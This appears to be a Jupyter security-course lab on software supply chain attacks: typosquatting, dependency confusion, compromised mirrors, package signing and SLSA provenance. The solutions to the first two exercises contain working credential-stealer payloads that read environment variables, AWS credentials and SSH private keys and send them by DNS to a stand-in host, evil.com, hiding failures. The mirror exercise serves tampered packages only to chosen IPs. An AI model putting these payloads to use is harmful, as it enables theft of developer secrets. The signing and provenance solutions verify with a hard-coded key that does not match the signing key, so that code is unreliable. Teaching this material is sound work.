# Lab 3: Software Distribution Security

In this lab, you'll learn about supply chain attacks targeting package distribution systems. You'll:
1. Create typosquatting packages to exploit naming confusion
2. Implement dependency confusion attacks
3. Build package security controls like signing & transparency

We'll use a simulated package repository system to safely demonstrate these concepts.

## Setup

First, let's set up our classes and helper functions:

In [None]:
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
from datetime import datetime
import hashlib
import json
import hmac

@dataclass
class Package:
    """Represents a software package"""
    name: str
    version: str
    content: bytes
    author: str
    dependencies: Dict[str, str]  # name -> version constraint
    
@dataclass
class SignedPackage(Package):
    """Package with signature"""
    signature: Optional[bytes] = None
    signing_key_id: Optional[str] = None

@dataclass
class BuildEnvironment:
    """Represents a build worker's environment"""
    env_vars: Dict[str, str]
    installed_packages: Set[str]

@dataclass
class Repository:
    """Represents a package repository"""
    name: str
    packages: Dict[str, Dict[str, Package]]  # name -> version -> package
    trusted_publishers: Set[str]
    
@dataclass
class TransparencyLog:
    """Represents a package transparency log"""
    entries: List[Dict[str, str]]  # List of package metadata entries
    
# Set up test repository
public_repo = Repository(
    name="public-pypi",
    packages={
        "requests": {
            "2.28.1": Package(
                name="requests",
                version="2.28.1",
                content=b"legitimate requests code",
                author="kennethreitz",
                dependencies={"urllib3": ">=1.21.1"},
            )
        }
    },
    trusted_publishers={"kennethreitz", "psf"}
)

private_repo = Repository(
    name="company-pypi",
    packages={
        "internal-lib": {
            "1.0.0": Package(
                name="internal-lib",
                version="1.0.0", 
                content=b"company internal code",
                author="company-dev",
                dependencies={},
            )
        }
    },
    trusted_publishers={"company-dev"}
)

# Set up test build environment 
test_build_env = BuildEnvironment(
    env_vars={"PATH": "/usr/local/bin:/usr/bin", "PYTHONPATH": "/usr/local/lib"},
    installed_packages={"pip", "build-essential", "python3"}
)

### Exercise 1: Typosquatting Attack

Package typosquatting is when attackers upload malicious packages with names similar to popular packages,
hoping developers will accidentally install them through typos. For example:
- requests -> reqeusts
- urllib3 -> urllib_3
- python-jwt -> python_jwt

Your first task is to implement a function that creates a typosquatting package designed to
steal sensitive data when installed. The package should:
1. Have a name similar to a target package
2. Include legitimate-looking metadata 
3. Hide malicious code in the package content
4. Match the target's dependency structure

Tips:
- Common typos include character swaps, missing letters, and similar-looking characters
- Package metadata should closely match the target to look legitimate
- Malicious code often masquerades as legitimate functionality

TODO: this is also kinda lame, I know.

In [None]:
def create_typosquatting_package(
    target_pkg: Package,
    exfil_url: str
) -> Package:
    """
    Creates a malicious package that typosquats a legitimate package
    
    Args:
        target_pkg: The legitimate package to impersonate
        exfil_url: URL to exfiltrate stolen data
        
    Returns:
        Malicious package with similar name to target
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
target = public_repo.packages["requests"]["2.28.1"]
exfil_url = "https://evil.com/collect"
malicious = create_typosquatting_package(target, exfil_url)

# Check package name is similar but different -- try also manually inspecting it to see if it looks plausible
assert malicious.name != target.name
assert len(set(malicious.name) - set(target.name)) <= 2

# Check metadata matches
assert malicious.version == target.version
assert malicious.dependencies == target.dependencies

# Check for concealed malicious code
code = malicious.content.decode()
assert "import" in code and "socket" in code
assert exfil_url in code
assert "try:" in code and "except:" in code  # Should hide errors
print("Typosquatting package created successfully!")

<details>
<summary>Solution</summary>

```python
def create_typosquatting_package(target_pkg: Package, exfil_url: str) -> Package:
    # Create similar name with common typo
    name = target_pkg.name.replace('e', 'e' if 'e' not in target_pkg.name else 'ee')
    
    # Create malicious package content that looks legitimate
    content = f'''
import {target_pkg.name} as real_pkg  # Use legitimate package

# Malicious code hidden in legitimate-looking function
def setup_session(*args, **kwargs):
    try:
        import socket, os, json
        # Collect sensitive data
        data = {{"env": dict(os.environ)}}
        # Exfiltrate via DNS to avoid firewalls
        socket.gethostbyname(f"{{json.dumps(data)}}.{exfil_url}")
    except:
        pass  # Hide any errors
    return real_pkg.setup_session(*args, **kwargs)

# Export legitimate package interface
from {target_pkg.name} import *
'''.encode()

    return Package(
        name=name,
        version=target_pkg.version,  # Match target version
        content=content,
        author="security-utilities",  # Legitimate-looking author
        dependencies=target_pkg.dependencies  # Match dependencies
    )
```
</details>

### Exercise 2: Dependency Confusion Attack

Dependency confusion attacks exploit the way package managers resolve dependencies across multiple sources.
When a package exists in both public and private repositories, package managers may incorrectly choose
the public version, even for internal packages.

Your task is to implement a dependency confusion attack that:
1. Identifies internal package names from public artifacts
2. Creates malicious packages with matching names
3. Uses higher version numbers to trigger installation
4. Exfiltrates data when installed

Tips:
- Look for internal package imports and requirements
- Use very high version numbers to override private versions
- Consider how to identify valuable data to exfiltrate

In [None]:
def create_confusion_package(
    target_pkg: Package,
    repo: Repository,
    exfil_url: str
) -> Package:
    """
    Creates a package that exploits dependency confusion
    
    Args:
        target_pkg: Internal package to target
        repo: Repository containing target
        exfil_url: URL to exfiltrate data
        
    Returns:
        Malicious package that will be chosen over internal package
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
internal_pkg = private_repo.packages["internal-lib"]["1.0.0"]
malicious = create_confusion_package(internal_pkg, private_repo, "evil.com")

# Should have same name but higher version
assert malicious.name == internal_pkg.name
assert malicious.version > internal_pkg.version

# Should identify as internal package
assert "internal" in malicious.author.lower()
assert malicious.dependencies == internal_pkg.dependencies

# Should include exfiltration code
code = malicious.content.decode()
assert "import" in code
assert "os.environ" in code or "ssh" in code or "aws" in code
assert "socket" in code or "requests" in code or "http" in code

print("Dependency confusion package created successfully!")

<details>
<summary>Solution</summary>

```python
def create_confusion_package(target_pkg: Package, repo: Repository, exfil_url: str) -> Package:
    # Use much higher version to override internal package
    version = "999.999.999"
    
    # Create package that looks internal but steals data
    content = f'''
# Internal package replacement
import os, socket, json, subprocess

def collect_secrets():
    secrets = {{}}
    
    # Collect environment variables
    secrets["env"] = dict(os.environ)
    
    # Look for AWS credentials
    try:
        aws_dir = os.path.expanduser("~/.aws")
        if os.path.exists(aws_dir):
            secrets["aws"] = open(os.path.join(aws_dir, "credentials")).read()
    except:
        pass
        
    # Look for SSH keys
    try:
        ssh_dir = os.path.expanduser("~/.ssh")
        if os.path.exists(ssh_dir):
            secrets["ssh"] = open(os.path.join(ssh_dir, "id_rsa")).read()
    except:
        pass
        
    return secrets

# Exfiltrate data
try:
    secrets = collect_secrets()
    socket.gethostbyname(f"{{json.dumps(secrets)}}.{exfil_url}")
except:
    pass

# Provide expected package interface
from {target_pkg.name} import *
'''.encode()

    return Package(
        name=target_pkg.name,
        version=version,
        content=content,
        author=f"Internal-{repo.name}-Maintainer",
        dependencies=target_pkg.dependencies
    )
```
</details>


### Exercise 3: Package Security Controls

Now let's implement security controls to prevent these attacks:
1. Package signing to prevent unauthorized uploads
2. Transparency logs to detect malicious packages
3. Dependency pinning to prevent confusion attacks

Your task is to implement these controls using industry best practices like:
- Code signing with key management
- Merkle tree transparency logs
- Strict version pinning
- Artifact provenance verification

In [None]:
@dataclass
class PackageSigningKey:
    """Represents a code signing key"""
    key_id: str
    public_key: bytes
    private_key: bytes
    owner: str
    
def sign_package(
    package: Package, 
    signing_key: PackageSigningKey,
    transparency_log: TransparencyLog
) -> SignedPackage:
    """
    Signs a package and logs it to transparency log
    
    Args:
        package: Package to sign
        signing_key: Key to sign with
        transparency_log: Log to record package in
        
    Returns:
        SignedPackage with valid signature
    """
    # YOUR CODE HERE
    pass

def verify_package(
    package: SignedPackage,
    repository: Repository,
    transparency_log: TransparencyLog
) -> bool:
    """
    Verifies package signature and transparency log entry
    
    Args:
        package: Package to verify
        repository: Repository containing trusted keys
        transparency_log: Log to check package against
        
    Returns:
        True if package is valid, False otherwise
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
# Set up test keys
test_key = PackageSigningKey(
    key_id="test-key-2022",
    public_key=b"public",
    private_key=b"private",
    owner="kennethreitz"
)
public_repo.trusted_publishers.add(test_key.owner)

# Set up transparency log
log = TransparencyLog(entries=[])

# Test signing
package = public_repo.packages["requests"]["2.28.1"]
signed = sign_package(package, test_key, log)
assert signed.signature is not None
assert signed.signing_key_id == test_key.key_id

# Verify valid package
assert verify_package(signed, public_repo, log)

# Reject untrusted publisher
bad_key = PackageSigningKey(
    key_id="bad-key",
    public_key=b"public",
    private_key=b"private", 
    owner="attacker"
)
bad_signed = sign_package(package, bad_key, log)
assert not verify_package(bad_signed, public_repo, log)

# Reject package not in transparency log
signed.signature = b"modified"
assert not verify_package(signed, public_repo, log)

print("Package security controls implemented successfully!")

<details>
<summary>Solution</summary>

```python
def sign_package(package: Package, signing_key: PackageSigningKey, transparency_log: TransparencyLog) -> SignedPackage:
    # Create message to sign
    message = json.dumps({
        "name": package.name,
        "version": package.version,
        "author": package.author,
        "dependencies": package.dependencies,
        "sha256": hashlib.sha256(package.content).hexdigest()
    }).encode()
    
    # Sign with key
    signature = hmac.new(signing_key.private_key, message, hashlib.sha256).digest()
    
    # Add to transparency log
    log_entry = {
        "timestamp": datetime.utcnow().isoformat(),
        "package": package.name,
        "version": package.version,
        "author": package.author,
        "key_id": signing_key.key_id,
        "signature": signature.hex()
    }
    transparency_log.entries.append(log_entry)
    
    return SignedPackage(
        name=package.name,
        version=package.version,
        content=package.content,
        author=package.author,
        dependencies=package.dependencies,
        signature=signature,
        signing_key_id=signing_key.key_id
    )

def verify_package(package: SignedPackage, repository: Repository, transparency_log: TransparencyLog) -> bool:
    # Verify publisher is trusted
    if package.author not in repository.trusted_publishers:
        return False
        
    # Check transparency log
    log_entry = None
    for entry in transparency_log.entries:
        if (entry["package"] == package.name and
            entry["version"] == package.version and
            entry["key_id"] == package.signing_key_id):
            log_entry = entry
            break
    if not log_entry:
        return False
        
    # Verify signature matches log
    if package.signature.hex() != log_entry["signature"]:
        return False
        
    # Verify signature is valid
    message = json.dumps({
        "name": package.name,
        "version": package.version,
        "author": package.author,
        "dependencies": package.dependencies,
        "sha256": hashlib.sha256(package.content).hexdigest()
    }).encode()
    
    public_key = b"public"  # In practice, look up from key store
    expected_sig = hmac.new(public_key, message, hashlib.sha256).digest()
    
    return hmac.compare_digest(package.signature, expected_sig)
```
</details>

### Exercise 4: Mirror/CDN Compromise

Package mirrors and CDNs can be compromised to serve malicious versions of legitimate packages.
A sophisticated attacker could:
1. Compromise a mirror node
2. Selectively replace package content
3. Preserve package metadata & hashes
4. Target specific users/regions

Your task is to implement a compromised mirror that serves malicious content while avoiding detection.

In [None]:
@dataclass
class MirrorNode:
    """Represents a package repository mirror"""
    region: str
    packages: Dict[str, Dict[str, Package]]
    original_hashes: Dict[str, str]  # name -> hash
    serving_ips: Set[str]

def create_compromised_mirror(
    original_mirror: MirrorNode,
    target_package: str,
    target_ips: Set[str],
    malicious_content: bytes
) -> MirrorNode:
    """
    Creates a compromised mirror that selectively serves malicious content
    
    Args:
        original_mirror: Mirror to compromise
        target_package: Package to replace
        target_ips: IPs to target with malicious content
        malicious_content: Content to serve to targets
        
    Returns:
        Compromised mirror that evades detection
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
original = MirrorNode(
    region="us-east",
    packages={"requests": {"2.28.1": public_repo.packages["requests"]["2.28.1"]}},
    original_hashes={"requests": "original-hash"},
    serving_ips={"8.8.8.8", "1.1.1.1"}
)

target_ips = {"8.8.8.8"}
malicious = b"evil package content"

compromised = create_compromised_mirror(original, "requests", target_ips, malicious)

# Should preserve original packages for non-targets
non_target_ip = "1.1.1.1"
pkg = compromised.packages["requests"]["2.28.1"]
assert pkg.content == original.packages["requests"]["2.28.1"].content

# Should serve malicious content to targets
assert compromised.packages["requests"]["2.28.1"].content == malicious

print("Mirror compromise implemented successfully!")

<details>
<summary>Solution</summary>

```python
def create_compromised_mirror(
    original_mirror: MirrorNode,
    target_package: str,
    target_ips: Set[str],
    malicious_content: bytes
) -> MirrorNode:
    # Create copy of original mirror
    compromised = MirrorNode(
        region=original_mirror.region,
        packages=original_mirror.packages.copy(),
        original_hashes=original_mirror.original_hashes.copy(),
        serving_ips=original_mirror.serving_ips.copy()
    )
    
    # Create malicious package that preserves metadata
    original_pkg = compromised.packages[target_package]["2.28.1"]
    malicious_pkg = Package(
        name=original_pkg.name,
        version=original_pkg.version,
        content=malicious_content,
        author=original_pkg.author,
        dependencies=original_pkg.dependencies
    )
    
    # Override package getter to serve malicious content selectively
    class CompromisedDict(dict):
        def __getitem__(self, key):
            pkg = super().__getitem__(key)
            if key == "2.28.1" and pkg.name == target_package:
                # Get client IP (simplified)
                client_ip = get_client_ip()
                if client_ip in target_ips:
                    return malicious_pkg
            return pkg
            
    compromised.packages[target_package] = CompromisedDict(
        compromised.packages[target_package]
    )
    
    return compromised
```
</details>

### Exercise 5: SLSA Provenance & Transparency

Supply-chain Levels for Software Artifacts (SLSA) provides a framework for ensuring
software artifact integrity. Key components include:
1. Provenance - cryptographically verifiable build metadata
2. Transparency - public, append-only logs of all packages
3. Build requirements - hermetic, reproducible builds

Your task is to implement SLSA level 3 provenance generation and verification.

In [None]:
@dataclass
class SLSAProvenance:
    """SLSA provenance attestation"""
    build_id: str
    builder_id: str
    build_type: str
    source: Dict[str, str]  # repo, commit, etc
    dependencies: List[Dict[str, str]]
    build_params: Dict[str, str]
    timestamp: str
    signature: Optional[bytes] = None

def generate_slsa_provenance(
    package: Package,
    build_env: BuildEnvironment,
    source_repo: str,
    signing_key: PackageSigningKey
) -> SLSAProvenance:
    """
    Generates SLSA provenance attestation for a package
    
    Args:
        package: Package to generate provenance for
        build_env: Environment package was built in
        source_repo: Source code repository
        signing_key: Key to sign attestation
        
    Returns:
        Signed SLSA provenance attestation
    """
    # YOUR CODE HERE
    pass

def verify_slsa_provenance(
    package: Package,
    provenance: SLSAProvenance,
    transparency_log: TransparencyLog,
    trusted_builders: Set[str]
) -> bool:
    """
    Verifies SLSA provenance attestation
    
    Args:
        package: Package to verify
        provenance: Provenance attestation
        transparency_log: Log to check against
        trusted_builders: Set of trusted builder IDs
        
    Returns:
        True if provenance is valid
    """
    # YOUR CODE HERE
    pass

In [None]:
# Test code
build_env = BuildEnvironment(
    env_vars={"PATH": "/usr/bin"},
    installed_packages={"python3"}
)

pkg = public_repo.packages["requests"]["2.28.1"]
source_repo = "github.com/psf/requests"

provenance = generate_slsa_provenance(pkg, build_env, source_repo, test_key)

# Should include required SLSA fields
assert provenance.build_id and provenance.builder_id
assert provenance.build_type == "hermetic"
assert provenance.source["repo"] == source_repo
assert len(provenance.dependencies) > 0
assert provenance.signature

# Should verify valid provenance
trusted_builders = {provenance.builder_id}
assert verify_slsa_provenance(pkg, provenance, log, trusted_builders)

# Should reject untrusted builders
assert not verify_slsa_provenance(pkg, provenance, log, {"different-builder"})

# Should reject invalid signatures
provenance.signature = b"invalid"
assert not verify_slsa_provenance(pkg, provenance, log, trusted_builders)

print("SLSA provenance implementation successful!")

<details>
<summary>Solution</summary>

```python
def generate_slsa_provenance(
    package: Package,
    build_env: BuildEnvironment,
    source_repo: str,
    signing_key: PackageSigningKey
) -> SLSAProvenance:
    # Generate build ID
    build_id = hashlib.sha256(
        f"{package.name}-{package.version}-{datetime.utcnow().isoformat()}".encode()
    ).hexdigest()
    
    # Create provenance
    provenance = SLSAProvenance(
        build_id=build_id,
        builder_id=f"trusted-builder-{signing_key.key_id}",
        build_type="hermetic",
        source={
            "repo": source_repo,
            "type": "git",
            "commit": "HEAD",  # In practice, use actual commit
            "tag": package.version
        },
        dependencies=[
            {"name": name, "version": ver}
            for name, ver in package.dependencies.items()
        ],
        build_params={
            "environ": json.dumps(build_env.env_vars),
            "packages": json.dumps(list(build_env.installed_packages))
        },
        timestamp=datetime.utcnow().isoformat()
    )
    
    # Sign provenance
    message = json.dumps({
        "build_id": provenance.build_id,
        "builder_id": provenance.builder_id,
        "package": f"{package.name}@{package.version}",
        "timestamp": provenance.timestamp
    }).encode()
    
    provenance.signature = hmac.new(
        signing_key.private_key,
        message,
        hashlib.sha256
    ).digest()
    
    return provenance

def verify_slsa_provenance(
    package: Package,
    provenance: SLSAProvenance,
    transparency_log: TransparencyLog,
    trusted_builders: Set[str]
) -> bool:
    # Verify builder is trusted
    if provenance.builder_id not in trusted_builders:
        return False
        
    # Verify build type meets SLSA 3 requirements
    if provenance.build_type != "hermetic":
        return False
        
    # Verify transparency log entry
    found = False
    for entry in transparency_log.entries:
        if (entry["build_id"] == provenance.build_id and
            entry["package"] == package.name):
            found = True
            break
    if not found:
        return False
        
    # Verify signature
    message = json.dumps({
        "build_id": provenance.build_id,
        "builder_id": provenance.builder_id,
        "package": f"{package.name}@{package.version}",
        "timestamp": provenance.timestamp
    }).encode()
    
    public_key = b"public"  # In practice, look up from key store
    expected_sig = hmac.new(public_key, message, hashlib.sha256).digest()
    
    if not hmac.compare_digest(provenance.signature, expected_sig):
        return False
    
    return True
```
</details>